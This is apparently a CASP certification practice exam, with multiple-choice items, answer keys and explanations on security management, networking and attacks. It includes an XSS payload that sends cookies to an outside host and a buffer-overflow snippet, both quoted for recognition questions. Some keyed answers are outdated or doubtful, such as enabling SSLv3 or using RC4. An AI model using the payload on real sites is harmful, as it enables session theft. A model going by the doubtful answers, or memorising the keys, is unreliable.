CASP Practice Exam 1
During user acceptance testing of an application, it is discovered that when entering order amounts, in at least three cases the application crashes when the user clicks Submit. In all three cases, it cannot be determined exactly what type of mistyping has caused the crash. Which tool could be used to reproduce this crash? A. online fuzzer B. black box C. protocol analyzer D. ping sweeper
Answer: A Explanation: Fuzzers are used to introduce errors to an application to determine whether the application handles the errors properly. In this case, a fuzzer could determine which character sequences are causing the crash.
You have been recently hired as the security administrator for your company. You need to ensure that the security policies that you establish have the maximum effect for the company. Which actors are most important to this success? A. all personnel B. upper-level management C. security personnel D. attackers
Answer: A Explanation: In order to have the maximum effect for the company, all personnel are important to the success of any security policies that you establish.
Company C is selling part of its business to Company D. The assets include a small plant, Company C's network, and 50 employees. In the transition, which of the following actions would pose the most risk to Company C? A. a temporary joining of the Company C and Company D networks B. a temporary joining of the plant network and the Company D network C. a temporary assignment of three technicians from Company C to the Company D network to help in the transition D. a temporary assignment of three technicians from the Company D network to the Company C network to help in the transition
Answer: A Explanation: Joining Company C's network to Company D's network, even temporarily, presents a big security risk.
Recently issues have been identified on the wireless LAN. Which of the following issues could be addressed with 802.11e? A. performance issues with VoIP and video streaming B. identification of rogue access points C. problems with roaming between access points D. elimination of interference
Answer: A Explanation: 802.11e is a standard that describes a method of providing QoS for wireless traffic. This could be used to give priority to the latency-sensitive traffic.
As part of your organization's comprehensive security plan, all departments must perform full data backups on a weekly basis. Which type of control does this describe? A. technical control B. administrative control C. physical control D. detective control
Answer: A Explanation: Data backups are technical controls.
If your organization performs a full backup every Sunday and a differential backup Monday through Saturday, what is the largest number of backup files that will have to be restored? A. 1 B. 2 C. 3 D. 7
Answer: B Explanation: If your organization performs a full backup every Sunday and a differential backup Monday through Saturday, the largest number of backup files that will have to be restored is two. In a differential scheme, only the full backup and the most recent differential backup must be restored.
After attending a security conference, your manager wants you to perform research on types of attacks in which the attacker reuses an attack that has worked on other organizations. It is very important to your manager that you learn as much about this type of attack as possible. What is this type of attack called? A. birthday attack B. target of opportunity C. zero-day attack D. drive-by attack
Answer: B Explanation: This type of attack is referred to as a target of opportunity attack. Once an attack has been successful on a particular device, attackers often try to locate other targets that use the same device to see if the same attack will be successful again.
Your company has recently purchased a new web server that will be customer facing. Currently no security controls are deployed on the web server. During risk analysis, it was determined that the cost of any web server compromise would be $250,000. You deploy a security solution for $25,000 that will provide a 90% reduction in risk. What is the ROI for this solution? A. $225,000 B. $200,000 C. $25,000 D. $22,250
Answer: B Explanation: To calculate return on investment, you must first calculate the percentage of the asset value that is covered by the solution:
$250,000 × .9 = $225,000
ROI = Modified asset value - Control cost = $225,000 - $25,000 = $200,000
During a forensic investigation, a systems administrator indicates that she is in possession of a copy backup of the compromised system. This backup was taken a few hours before an attack disabled the system. You must decide whether to use the copy backup to restore the system. What is this type of backup? A. a backup that backs up all the files, much like a full backup, but does not reset the file's archive bit B. a backup that uses a file's time stamp to determine whether it needs to be archived C. a backup in which all files that have been changed since the last full backup will be backed up, and the archive bit for each file will not be cleared D. a backup in which all files that have been changed since the last full or incremental backup will be backed up, and the archive bit for each file will be cleared
Answer: A Explanation: A copy backup backs up all the files, much like a full backup, but does not reset the file's archive bit.
As a storage administrator, you are implementing a storage solution for a customer. He has suggested that you implement a solution that uses iSCSI to access the data. Which of the following is a security issue you need to discuss with him? A. its use of block-level data B. its use of file-level data C. its inability to use CHAP authentication D. its inability to use IPsec
Answer: A Explanation: Because iSCSI accesses blocks of data rather than files, any security breaches expose more information than would be the case with file-level access, as in NAS.
Your organization is currently working to ensure that the enterprise follows recognized standards. Which of the following statements is TRUE regarding using standards in your organization? A. De jure standards should take precedence over all other standards, including de facto standards. B. De facto standards should take precedence over all other standards, including de jure standards. C. Competing standards should be ignored. D. The organization should adhere only to standards managed by a standards organization.
Answer: A Explanation: De jure standards should take precedence over all other standards, including de facto standards.
The SDLC team is creating a new process to improve the quality of in-house applications. The team lead has identified a product called a fuzzer that he wants to use. What is a fuzzer used for? A. to verify that an application is properly handling user error exceptions B. to verify the performance of the application C. to perform a vulnerability assessment of the application D. to perform a penetration test of the application
Answer: A Explanation: Fuzzers are used to introduce errors to an application to determine whether the application handles the errors properly.
As a SAN administrator, you are implementing a storage solution for a customer. A server will remotely mount physical disks on the shared SAN and then write a large number of small files to disk before a Java program processes the files. Which consideration is most important to ensure that the files can be processed successfully by the Java program? A. Ensure that the server can write the files to the disk as fast as the Java program can process them. B. Ensure that the Java program has the latest updates. C. Ensure that the server has multiple NICs. D. Ensure that the server utilizes processor affinity.
Answer: A Explanation: If the Java program is reading the data faster than the file system is writing the data, there may be an issue with processing the data. It will appear as incompletely written to the disk.
You and the network access team are discussing how to control access to the network. While one team member suggests using a captive SSL portal, others are in favor of using 802.1x with a RADIUS server. Why would the latter suggestion be better? A. A captive SSL portal may be exploitable with a simple packet sniffer. B. The portal cannot display an AUP. C. SSL cannot encrypt the transmissions. D. 802.1x can be applied to open Ethernet jacks.
Answer: A Explanation: In some implementations of an SSL captive portal, once the device is granted access, the MAC address or IP address of the device is allowed to bypass the captive portal. By using a sniffer, a hacker could learn the MAC or IP address of an authenticated device, spoof the address, and gain entry.
Your company completes a risk analysis. After the analysis, management requests that you deploy security controls that will mitigate any of the identified risks. Management indicates that there is an expected level of residual risk that they expect. What is residual risk? A. risk that is left over after safeguards have been implemented B. terminating the activity that causes a risk or choosing an alternative that is not as risky C. passing the risk on to a third party D. defining the acceptable risk level the organization can tolerate and reducing the risk to that level
Answer: A Explanation: Residual risk is risk that is left over after safeguards have been implemented.
After a breach in your organization resulted in the public release of top-secret information, the company implemented a MAC that enforces no read-up, a MAC that enforces no write-down, and a DAC that uses an access matrix. What is the property that has been implemented with the no-read-up MAC? A. simple security property B. star property C. discretionary security property D. strong star property
Answer: A Explanation: The Bell-LaPadula model defines two mandatory access control (MAC) rules and one discretionary access control (DAC) rule with three security properties. The following properties have been implemented in this scenario: No-read-up MAC is a simple security property. No-write-down MAC is a star property. DAC using an access control matrix is a discretionary security property.
Companies A and B are merging, with the security administrator for Company A becoming head of IT. In which of the following scenarios would the first step be to perform a vulnerability assessment of Company B's network? A. The two networks must be joined. B. An application used by Company B must be integrated by Company A. C. The two networks have overlapping IP address ranges. D. An attack is under way in Company A's network.
Answer: A Explanation: The first step should be to assess any vulnerabilities that exist in Company B's network so that when the networks are joined, the issues will not be transferred to Company A's network.
After several support calls complaining about network issues, you capture the following series of packets:
06:02:50.626330 arp reply 192.168.99.35 is-at 0:80:c8:f8:4a:51 (0:80:c8:f8:4a:51)
06:02:51.622727 arp reply 192.168.99.35 is-at 0:80:c8:f8:4a:51 (0:80:c8:f8:4a:51)
06:02:52.620954 arp reply 192.168.99.35 is-at 0:80:c8:f8:4a:51 (0:80:c8:f8:4a:51)
What type of attack is occurring? A. man-in-the-middle B. VLAN hopping C. SYN flood D. smurf
Answer: A Explanation: The packets displayed are gratuitous ARP replies. They are created by the hacker and are replies to a question that never came from the devices in the network. This attack causes the devices to update their ARP cache with the mappings included in the packet. This creates incorrect mappings in the devices' ARP caches, and when done correctly, it can cause the hacker to receive all traffic between two machines—or make him the man in the middle in a man-in-the-middle attack.
Your company recently experienced a breach of a server that resulted in intellectual property loss. Now the security team is looking for additional attack surfaces in the network that could lead to another such loss. Which of the following issues presents the greatest possibility of this type of loss again? A. company laptops accessing social media sites through the guest wireless network B. users accessing shopping sites on personal devices through the main network C. users accessing the network through a VPN connection D. guest users accessing the Internet on the guest wireless network
Answer: A Explanation: When company laptops access social media sites from any network, there are two ways information could be lost. First, malware from a site could infect the system, allowing access later through a back door. Second, users sometimes inadvertently reveal information on social media sites.
The company you work for has implemented the following security controls:
- All workstations have the latest patches and antivirus.
- All sensitive data is encrypted in transit.
- Dual-factor user authentication is used.
- A firewall at the edge of the network is implemented.
What is missing from this security posture? A. no local encryption B. weak user authentication C. insufficient edge control D. exposure to viruses
Answer: A Explanation: While transport encryption has been enabled, the sensitive data should be encrypted on the hard drives as well.
An employee has been accused of carrying out a crime from his corporate desktop PC. You have been asked to capture the current state of the PC, including all of its contents, according to proper forensic rules. When you locate the PC, it is turned off. What is the order of capture for this system? A. hard drive, BIOS settings, external media B. RAM, hard drive, external media C. RAM, external media, hard drive D. hard drive, external media, BIOS settings
Answer: A Explanation: You should capture the forensic data in the following order: hard drive, BIOS settings, and external media.
Your company is negotiating with a new service provider for its Internet services. You have been asked to draft a service-level agreement (SLA) that stipulates the required levels of service for this company. The SLA must provide the appropriate levels of service that will ensure that your company's departmental SLAs are met. What should you use to develop the draft SLA? A. OLA B. NDA C. MOU D. ISA
Answer: A Explanation: You should use the operating-level agreement (OLA) to develop the draft SLA. You need to ensure that your company's departmental SLAs are met. These are defined in an OLA.
Several of your organization's users have requested permission to install certificates from a third party. Company policy states that before users can install these certificates, you must verify that the certificates are still valid. You need to check for revocation. What could you check to verify this information? (Choose all that apply.) A. CRL B. OCSP C. DNSSEC D. DRM
Answer: A, B Explanation: You can use either a certificate revocation list (CRL) or Online Certificate Status Protocol (OCSP) to check for certificate revocation, depending on which type of PKI is deployed.
As the security administrator for your organization, you are responsible for recognizing situations that will cause organizational security issues. Which of the following should be considered? (Choose all that apply.) A. company mergers B. internal restructure C. government regulations D. new industry threats identified
Answer: A, B, C, D Explanation: All of the situations given will cause organizational security issues.
Recently, management has attended a security awareness workshop where advanced persistent threats (APTs) were discussed in great detail. After returning from the training, management has requested that you take any precautions necessary to protect against APTs. Which of the following are characteristics of these threats? (Choose all that apply.) A. APTs maintain a way to access an attacked device over and over again. B. APTs are carried out from multiple locations on a single device. C. The goal of APTs is to interrupt network operations. D. APTs quietly obtain information about an attacked device.
Answer: A, D Explanation: APTs maintain a way to access an attacked device over and over again, and they quietly obtain information about the attacked device.
An organization that utilizes single sign-on has a primary domain and three secondary domains. Which of the following statements will be true of this scenario? (Choose all that apply.) A. The secondary domains need to trust the primary domain to protect the authentication credentials used to verify the end-user identity to the secondary domains for authorized use. B. The primary domain needs to trust the secondary domains to protect the authentication credentials used to verify the end-user identity to the primary domain for authorized use. C. The secondary domains will assert the identity and authentication credentials to the primary domain on behalf of the user. D. The primary domain will assert the identity and authentication credentials to the secondary domains on behalf of the user.
Answer: A, D Explanation: The secondary domains have to trust the primary domain to correctly assert the identity and authentication credentials of the end user and protect the authentication credentials used to verify the end-user identity to the secondary domain from unauthorized use. The authentication credentials have to be protected when transferred between the primary and secondary domains against threats arising from interception or eavesdropping leading to possible masquerade attacks.
The storage team is discussing the implementation of shared storage to support a business-critical, high-volume database application. Which of the following characteristics makes a NAS unsuitable for this application? A. its use of block-level data transfers B. its use of file-level data transfers C. its excessive cost compared to a SAN D. its inability to utilize NFS
Answer: B Explanation: A NAS uses file-level transfers of data, which is not appropriate for this type of application. This application would benefit from the use of block-level transfers, which is more efficient and is what would be used with a SAN.
If you implement FCoE in your storage network, which of the following security issues should concern you? A. a breach of the Fibre Channel network B. a breach of the Ethernet network C. the use of iSCSI commands D. the inability to use encryption
Answer: B Explanation: Because FCoE encapsulates Fibre Channel frames within Ethernet frames, a breach of the Ethernet network would be a concern.
Your organization recently deployed a standard operating system image to all desktop systems and is now scanning the computers weekly against a security baseline. Which of the following cannot be learned by scanning against the baseline? A. whether security settings have been changed B. whether user data has been deleted C. whether security policies have been disabled D. whether antimalware software has been removed
Answer: B Explanation: Because the data was not present in the image, it cannot be detected as missing when the scan is run.
Your organization has recently implemented several new security policies in response to a recent risk analysis. One of the new policies states that controls must be configured to protect files from unauthorized or accidental deletion. Which aspect of security does this new policy address? A. confidentiality B. integrity C. availability D. authorization
Answer: B Explanation: Configuring controls that will protect files from unauthorized or accidental deletion addresses data integrity.
Your company, a healthcare provider, is considering outsourcing its messaging system to a managed service provider. The proposal presented makes no mention of a DLP functionality. If this is not present, which of the following are you in danger of experiencing? A. poor messaging performance B. loss of PII C. open email relay D. unauthenticated sessions
Answer: B Explanation: Data loss prevention (DLP) systems are used to control what users can email and print (among other things). When DLP is not in place, it is possible for personally identifiable information (PII) to be mistakenly emailed or printed and released.
As part of the process of conducting a business impact analysis (BIA), you document the device name, operating system or platform version, hardware requirements, and device interrelationships of all devices. Which step of the BIA are you performing? A. Identify critical processes and resources. B. Identify resource requirements. C. Identify outage impacts, and estimate downtime. D. Identify recovery priorities.
Answer: B Explanation: During the identify resource requirements step, you document the device names, operating systems or platform versions, hardware requirements, and device interrelationships of all devices.
The web development team has a new application that needs to be assessed from a security standpoint. When the third-party testing team presents its test cases, it mentions that an HTTP interceptor is one of the tools it will utilize. Which of the following issues would this be most suitable to test for? A. open ports B. input validation of a form C. access control D. performance under stress
Answer: B Explanation: HTTP interceptors are tools that can be used to introduce invalid input to see if the application performs proper input validation.
After a recent meeting, your team was provided with the following list of requirements for a new network location:
- Confidentiality, integrity, and availability (CIA) are all of equal importance.
- Average availability must be at least 6 nines (99.9999%).
- All devices must support collaboration with every other user device.
- All devices must be VoIP and teleconference ready.
To meet these requirements your team takes the following actions:
- Enforces security policies on mobile/remote devices
- Makes standard images and checks device hardware configurations
- Backs up all storage devices
Considering the actions your team has taken, which requirement is MOST likely to not be met? A. Confidentiality, integrity, and availability (CIA) are all of equal importance. B. Average availability must be at least 6 nines (99.9999%). C. All devices must support collaboration with every other user device. D. All devices must be VoIP and teleconference ready.
Answer: B Explanation: It will be difficult to meet 6 nines' availability without multiple layers of redundancy.
Your company is merging with another company that operates in several other countries. Which of the following security issues is MOST likely to be affected by the differences in legal or regulatory requirements? A. software coding practices B. expectation of privacy policy C. network access controls D. disaster recovery procedures
Answer: B Explanation: Legal or regulatory requirements in various countries may restrict the type of employee monitoring that can be done in a country.
You are moving to a new location and have been asked to assess the security additions required in the new location. Which of the following concerns could be addressed with a mantrap? A. need to log all visitors B. prevention of tailgating C. dim lighting in the parking lot D. contractors connecting to open ports
Answer: B Explanation: Mantraps afford the ability to allow one user or visitor to enter at a time, preventing tailgating.
Management at your company has become increasingly concerned about botnet attacks. After researching the issue, you decide to monitor certain conditions to help detect whether a botnet attack is under way. Which trend is the best indicator of this type of attack? A. connection attempts increase on Internet-facing web servers B. TCP and UDP traffic increase during off-peak hours C. port scanning attempts increase over a 24-hour period D. unsuccessful logins increase during peak hours
Answer: B Explanation: Of the possibilities listed, the best indicator of a botnet attack is an increase in TCP and UDP traffic during off-peak hours.
What is the name of the process of automatically removing sensitive material from outgoing emails? A. scrapping B. sanitizing C. filtering D. profiling
Answer: B Explanation: Removing data from outgoing email is called sanitizing.
Your boss just returned from a security conference and is concerned that users are not creating good passwords. He wants you to run password auditing software against the password file. What would be the biggest benefit of loading the file onto a four-server cluster and running the scan there? A. better scan results B. faster results C. less network traffic created D. less chance of malware infection
Answer: B Explanation: Running the scan on the four-server cluster would allow the additional processing power to be used to finish the scan much faster.
Your company must design the security requirements for several new systems. Which personnel should develop these? A. management B. security personnel C. programmers D. database administrator
Answer: B Explanation: Security personnel should develop a company's security requirements.
You have decided to deploy SPML to facilitate the exchange of provisioning information among applications. On what language is this based? A. HTML B. XML C. HTTP D. SFTP
Answer: B Explanation: Service Provisioning Markup Language (SPML) is an XML-based framework for exchanging user, resource, and service provisioning information between cooperating organizations.
The help desk is reporting that because of multiple passwords for services, users are overutilizing the help desk for password resets. Which of the following features would help solve this problem? A. NAT B. SSO C. SSL D. STP
Answer: B Explanation: Single sign-on (SSO) allows the user to authenticate once to access all services. This gives each person a single password to remember.
You have been given both a physical network diagram and a logical network diagram for your company's enterprise. Which of the following information is shown only on the physical network diagram? A. device names B. cabling used C. IP addresses D. device roles
Answer: B Explanation: The cabling used is shown only on the physical network diagram.
The following code is an example of what type of attack?
    #include <string.h>
    char *code = "AAAABBBBCCCCDDD"; // 15 characters plus the terminating '\0' = 16 bytes
    int main(void) {
        char buf[8];          // destination buffer holds only 8 bytes
        strcpy(buf, code);    // copies 16 bytes into the 8-byte buffer with no bounds check
        return 0;
    }
A. SQL injection B. buffer overflow C. cross-site scripting D. integer overflow
Answer: B Explanation: The code is an example of a buffer overflow. In this example, 16 characters are being sent to a buffer that is only 8 bytes.
You work for a cable company that utilizes VLANs in its internal network and provides customers with connections between locations. If the company were to offer MPLS, what additional service would the company be able to offer customers that it currently cannot offer? A. metro Ethernet B. establishment of VLANs between sites C. cable TV and Internet service D. transport encryption
Answer: B Explanation: The implementation of MPLS would allow the cable company to keep VLANs of customers separate from its own internal VLANs.
Your company recently had a third party review all internal procedures. As a result of this review, the third party made several recommendations for procedural changes. One of the recommendations is that critical financial transactions should be split between two independent parties. Of which principle is this an example? A. job rotation B. separation of duties C. least privilege D. mandatory vacation
Answer: B Explanation: This is an example of separation of duties, which occurs when critical tasks are split between independent parties to prevent fraud.
You would like to reduce the risk associated with the administrative access you need to give several IT employees. You would like to enforce separation of duties, but you also want the employees to be able to perform one another's functions when an employee is absent. To support each employee's primary role, you implement role-based access control. What will be the safest way to allow the employees to step in for one another when necessary? A. Include those permissions in the primary role. B. Provide those permissions manually when required. C. Assign all permissions to a single role and assign the role to all IT employees. D. Create multiple accounts for each user and have them use one account only when required.
Answer: B Explanation: To reduce risk the most, you should give the employees the additional permission on an ad hoc basis, as needed.
Which of the following attacks could be detected through SIP and SRTP traffic analysis? A. smurf B. SPIT C. SYN flood D. teardrop
Answer: B Explanation: VoIP spam, or spam over IP telephony (SPIT), consists of bulk unsolicited calls placed over VoIP. The underlying technology driving this threat is Session Initiation Protocol (SIP). Secure Real-time Transport Protocol (SRTP) is a secure version of Real Time Protocol (RTP) that is also used in VoIP traffic. Through SIP and SRTP traffic analysis, these attacks can be detected.
You need to implement a technology that can prevent IP spoofing. Which of the following would do this? A. DNSSEC B. unicast reverse path forwarding C. private VLANs D. port security
Answer: B Explanation: When enabled, unicast reverse path forwarding allows a router to verify the reachability of the source address in packets being forwarded. If the router cannot find a path back to the IP address in its routing table using the interface on which it arrived, it knows spoofing is occurring, and it drops the packet.
Remote users connect to a VPN concentrator for video conferences. Which of the following configurations, if enabled, would reduce the performance of the conference for the remote users? A. single sign-on B. split tunneling C. routing protocols D. STP
Answer: B Explanation: While split tunneling allows users to access the corporate LAN and the Internet at the same time, it also reduces the bandwidth available to the conference and lowers performance.
Your organization needs to retain a legacy application for the inventory department. Next year, a new application will be purchased, and all the current data will be exported to the new application at that time. For the time being, you have been asked to retain the legacy application. The computer on which the legacy application resides can no longer be supported and must be removed from the enterprise. You have been asked to implement a solution that allows the legacy application to remain in use. What should you do? A. Deploy the legacy application on its own VLAN. B. Deploy the legacy application on a virtual machine. C. Deploy the legacy application on the DMZ. D. Deploy the legacy application on a public cloud.
Answer: B Explanation: You should deploy the legacy application on a virtual machine. This ensures that the legacy application is still supported while ensuring that the computer it is on can be removed from the enterprise.
You have documented several possible solutions to a security issue that occurred last week. You need to test all the possible solutions to see the effect that each has and to determine which to deploy. Which is the most important guideline you should follow? A. Maintain adequate bandwidth while testing each solution. B. Test each solution under the same conditions. C. Patch all lab computers prior to testing each solution. D. Determine the acceptable false-positive maximum.
Answer: B Explanation: You should test each solution under the same conditions. This ensures that each solution will be assessed fairly in comparison to the others.
You have recently been hired to manage your company's security team. You must ensure that an effective security team is built. Which policies should you keep in mind for this? (Choose all that apply.) A. The team leadership must be obtained from within the security industry. B. Team members must include individuals from across the entire spectrum of security. C. Team goals must be clearly defined and understood. D. Team actions must have clearly defined rules.
Answer: B, C, D Explanation: You should keep in mind the following policies: Team members must include individuals from across the entire spectrum of security. Team goals must be clearly defined and understood. Team actions must have clearly defined rules.
You are your company's security analyst. Management has allocated funds for you to attend one conference this year. You have been asked to focus on a conference that will most improve your security knowledge. The conference needs to include training on the latest hacking techniques. Which of the following conferences should be among those that you research? (Choose all that apply.) A. ISSA B. DEFCON C. RSA Conference D. Black Hat Conference
Answer: B, C, D Explanation: You should research DEFCON, RSA Conference, and Black Hat Conference and then select the one that best fits your needs as a security analyst.
You need to protect your organization's confidential or private data. The method you choose must isolate this data from all other types of data. Which of the following are valid methods of protecting confidential or private data? (Choose all that apply.) A. Place the data on a flash drive. B. Place the devices that store this information on their own VLAN. C. Create a separate folder on a public server to store this type of data. D. Place this type of data on separate servers.
Answer: B, D Explanation: You could place the devices that store this information on their own VLAN or place this type of data on separate servers.
Your organization has decided to purchase a new security device for your enterprise. Unfortunately, you have some very unique needs that must be documented. You are unsure of how some of these needs will be met. You decide to create a document that seeks information to determine the device's requirements. You will send this document to all vendors that may have products to offer. Which document are you creating? A. RFP B. RFC C. RFI D. RFQ
Answer: C Explanation: A request for information (RFI) is a document that solicits information on a product from vendors.
Company E has a contract with a smaller company. The smaller company provides security at a high-security location. Company E discovers that the smaller company has subcontracted some of the functions. What is the minimum step that Company E must take in reaction to this situation? A. Do nothing. It is shielded from liability. B. Execute a new contract that includes the subcontractor. C. Require the security contractor to execute a service agreement with the subcontractor. D. Fire the security consulting company.
Answer: C Explanation: At a minimum, the company should require and examine the service contract between the contractor and subcontractor to ensure that the company is insulated from liability issues and service issues.
Credential Security Support Provider (CredSSP) provides SSO and network-level authentication to which of the following services? A. SharePoint services B. Project server services C. Remote Desktop Services D. SQL
Answer: C Explanation: Credential Security Support Provider (CredSSP), introduced in Windows Vista and available on Windows XP SP3 and later, provides SSO and network-level authentication for Remote Desktop Services.
As part of the process of conducting a business impact analysis (BIA), you perform the MTD, MTTR, and MTBF calculations. Which step of the BIA are you performing? A. Identify critical processes and resources. B. Identify resource requirements. C. Identify outage impacts, and estimate downtime. D. Identify recovery priorities.
Answer: C Explanation: During the identify outage impacts and estimate downtime step, you perform the MTD, MTTR, and MTBF calculations.
You are the security analyst for your company. In recent months, the security demands of the company have greatly increased. Management has adopted a new policy which states that security is an ever-changing field requiring research to remain abreast of the latest threats and security measures. As part of this policy, you have been tasked with regularly performing research on security issues. What is the most important topic to research on a regular basis? A. new security systems B. best practices C. new technologies D. new threats to existing technologies
Answer: C Explanation: It is most important to research new technologies on a regular basis. New technologies will not have any identified best practices and security procedures. By researching new technologies, you will ensure that you better understand the security issues related to these technologies.
When a user authenticates to your network, a web access control infrastructure performs authentication and passes attributes in an HTTP header to multiple applications. What is this process called? A. federated authentication B. delegated authentication C. single sign-on D. portal authentication
Answer: C Explanation: Single sign-on allows a user to authenticate once to access all services. This gives each person a single password to remember.
As your company's security practitioner, you are responsible for host, storage, network, and application integration into the secure enterprise architecture. Your company's security policy states that you must ensure that the CIA of data is ensured across its entire life cycle. Which principle will provide this functionality? A. least privilege B. separation of duties C. defense in depth D. social engineering
Answer: C Explanation: The principle of defense in depth ensures that the CIA of data is ensured across its entire life cycle.
The following script is designed to attempt what type of attack? <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT> A. SQL injection B. buffer overflow C. XSS D. integer overflow
Answer: C Explanation: The script is designed to attempt a cross-site scripting (XSS) attack.
In the following raw HTTP request, which part is problematic? GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts&to_date=01-01-0101&Run=Run&UserEntered=dsmith&SessionID=5f04189bc&from_date=31-10-2010&TypesEntered=1 HTTP/1.1 Host: test.example.net Accept: */* Accept-Language: en Connection: close Cookie: java14=1; java15=1; java16=1; js=1292192278001; A. Host: test.example.net B. Connection: close C. Run&UserEntered=dsmith&SessionID=5f04189 D. Accept: */*
Answer: C Explanation: The section Run&UserEntered=dsmith&SessionID=5f04189 contains the session ID of an authenticated user: the user is dsmith and the session ID is 5f04189.
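An added example (not part of the exam text) of the check a reviewer would run over such requests: parse the request line and flag any query parameter that carries a session identifier, which is what makes this request problematic. The watch-list of parameter names is an assumption; the sample request is the one quoted in the question.

```python
from urllib.parse import parse_qsl, urlsplit

# Assumed watch-list: query-parameter names that commonly carry a session credential.
SESSION_PARAM_NAMES = {"sessionid", "sessid", "phpsessid", "jsessionid", "sid", "token"}

# Constructed sample: the raw request from the question, one header per line.
SAMPLE_REQUEST = (
    "GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts"
    "&to_date=01-01-0101&Run=Run&UserEntered=dsmith&SessionID=5f04189bc"
    "&from_date=31-10-2010&TypesEntered=1 HTTP/1.1\r\n"
    "Host: test.example.net\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en\r\n"
    "Connection: close\r\n"
    "Cookie: java14=1; java15=1; java16=1; js=1292192278001;\r\n"
    "\r\n"
)


def session_params_in_url(raw_request: str) -> list:
    """Return (name, value) pairs from the request-line query string whose
    name looks like a session identifier. Session tokens in a URL end up in
    browser history, proxy logs and Referer headers, unlike cookie values."""
    lines = raw_request.lstrip().splitlines()
    if not lines:
        return []
    parts = lines[0].split()          # METHOD SP request-target SP HTTP-version
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query  # everything after '?' in the request target
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if name.lower() in SESSION_PARAM_NAMES
    ]


if __name__ == "__main__":
    for name, value in session_params_in_url(SAMPLE_REQUEST):
        print(f"session identifier exposed in URL: {name}={value}")
```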
Your organization needs to deploy its network so that all servers are isolated from the rest of the internal resources. In addition, Internet-facing systems must be isolated on a demilitarized zone (DMZ) from the internal network. How many firewalls should you deploy? A. one B. two C. three D. four
Answer: C Explanation: You should deploy three firewalls: one between the Internet and the DMZ, one between the DMZ and the internal network, and one between the internal network and the server network.
Your company has an intrusion detection system (IDS) and firewall deployed on the perimeter of the network to detect attacks against internal resources. Yesterday, the IDS alerted you that SSL sessions are under attack, using an older exploit against SSLv2. Your organization's web server must use encryption for all financial transactions. You need to prevent such an attack from being successful in the future. What should you do? A. Block SSLv2 on the firewall. B. Block SSLv2 on the web server. C. Disable SSLv2 and enable SSLv3 on the web server. D. Update the web server with the latest patches and updates.
Answer: C Explanation: You should disable SSLv2 and enable SSLv3 on the web server. This will prevent the use of SSLv2, which is the problem.
A new security policy adopted by your organization states that you must monitor for attacks that compromise user accounts. Which of the following activities should you monitor? A. sensitive file access in a 12-hour period B. average throughput of the network perimeter C. failed logins in a 24-hour period D. port scans in a 24-hour period
Answer: C Explanation: You should monitor failed logins in a 24-hour period. Brute-force attacks attempt to access the same user account using different passwords, resulting in repeated failed logins.
Your company has recently decided to merge with another company. Each company has its own Internet PKI that deploys certificates to users within that network. You have been asked to deploy a solution that allows each company to trust the other's certificates. What should you do? A. Issue a policy certificate accepting both trust paths. B. Deploy a new PKI for all users and import the current user certificates to the new PKI. C. Use a cross-certification certificate. D. Add the root certificate to both of the root certification authorities (CAs).
Answer: C Explanation: You should use a cross-certification certificate to ensure that each company trusts the other company's certificates.
Your company has recently adopted a formal change management process. All changes must be approved by the change control board. Which of the following statements regarding this process are true? (Choose all that apply.) A. Proper change management reduces operational difficulty. B. Proper change management results in reduced implementation costs. C. Proper change management ensures that there are minimum service interruptions. D. Proper change management reduces the number of rollbacks needed when updates fail.
Answer: C, D Explanation: The following statements regarding the change management process are true: Proper change management ensures that there are minimum service interruptions. Proper change management reduces the number of rollbacks needed when updates fail.
Input validation is a technique used to prevent which of the following application attacks? A. memory leaks B. privilege escalation C. improper error handling D. SQL injection
Answer: D Explanation: A SQL injection attack inserts, or "injects," a SQL query as the input data from the client to the application. To prevent these types of attacks, use proper input validation.
You install an SSL VPN that connects to your data center and have users connect to a standard virtual workstation image. Which of the following requirements have you NOT met? A. All data is encrypted in transport. B. Users will have the same data sets set at the same version. C. All data must remain in the data center. D. Users must not access the system between 12 a.m. and 1 a.m.
Answer: D Explanation: All requirements are met with the exception of preventing access between 12 a.m. and 1 a.m. To accomplish this, you must set workstation time of day restrictions.
The research department for your company needs to carry out a web conference with a third party. The manager of the research department has requested that you ensure that the web conference is encrypted because of the sensitive nature of the topic that will be discussed. Which of the following should you deploy? A. SSL B. SET C. IPsec D. RC4
Answer: D Explanation: RC4 is a stream-based cipher and could be used to encrypt web conference traffic.
Your company completes a risk analysis. After the analysis, management requests that you deploy security controls that will mitigate any of the identified risks. What is risk mitigation? A. risk that is left over after safeguards have been implemented B. terminating the activity that causes a risk or choosing an alternative that is not as risky C. passing the risk on to a third party D. defining the acceptable risk level the organization can tolerate and reducing the risk to that level
Answer: D Explanation: Risk mitigation is defining the acceptable risk level the organization can tolerate and reducing the risk to that level.
Your company has a single, centralized web-based retail sales system. Orders come in 12 hours per day, 364 days per year. Sales average $500,000 per day. Attacks against the retail sales system occur on a daily basis. For the retail sales system, there is a 1% chance of a hacker bringing the system down. The mean time to restore the system is 6 hours. What is the ALE for this system? A. $912,500 B. $250,000 C. $500,000 D. $910,000
Answer: D Explanation: The annualized loss expectancy (ALE) for the system is $910,000. The asset value (AV) is $500,000. The exposure factor (EF) is 0.5 (6 hours/12 hours). Single loss expectancy (SLE) = AV × EF = $500,000 × 0.5 = $250,000. Annualized rate of occurrence (ARO) = 0.01 × 364 = 3.64. Annualized loss expectancy (ALE) = SLE × ARO = $250,000 × 3.64 = $910,000.
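The same ALE calculation carried through in code, as an added example that is not part of the exam text. It follows the explanation's steps (AV, EF from MTTR over the daily order window, SLE, ARO from daily probability times operating days) and adds one guard the exam does not show: an outage longer than the order window cannot lose more than one day's sales, so EF is capped at 1.0.

```python
def exposure_factor(mttr_hours: float, window_hours: float) -> float:
    """Fraction of a day's revenue lost per outage: MTTR / daily order window.
    Capped at 1.0 because a single outage cannot lose more than the whole day."""
    if window_hours <= 0:
        raise ValueError("order window must be positive")
    return min(mttr_hours / window_hours, 1.0)


def annualized_loss(daily_sales: float, window_hours: float, mttr_hours: float,
                    daily_probability: float, days_per_year: int) -> dict:
    """Return AV, EF, SLE, ARO and ALE for an asset valued per operating day."""
    av = daily_sales                          # asset value: one day's sales
    ef = exposure_factor(mttr_hours, window_hours)
    sle = av * ef                             # single loss expectancy
    aro = daily_probability * days_per_year   # annualized rate of occurrence
    return {"AV": av, "EF": ef, "SLE": sle, "ARO": aro, "ALE": sle * aro}


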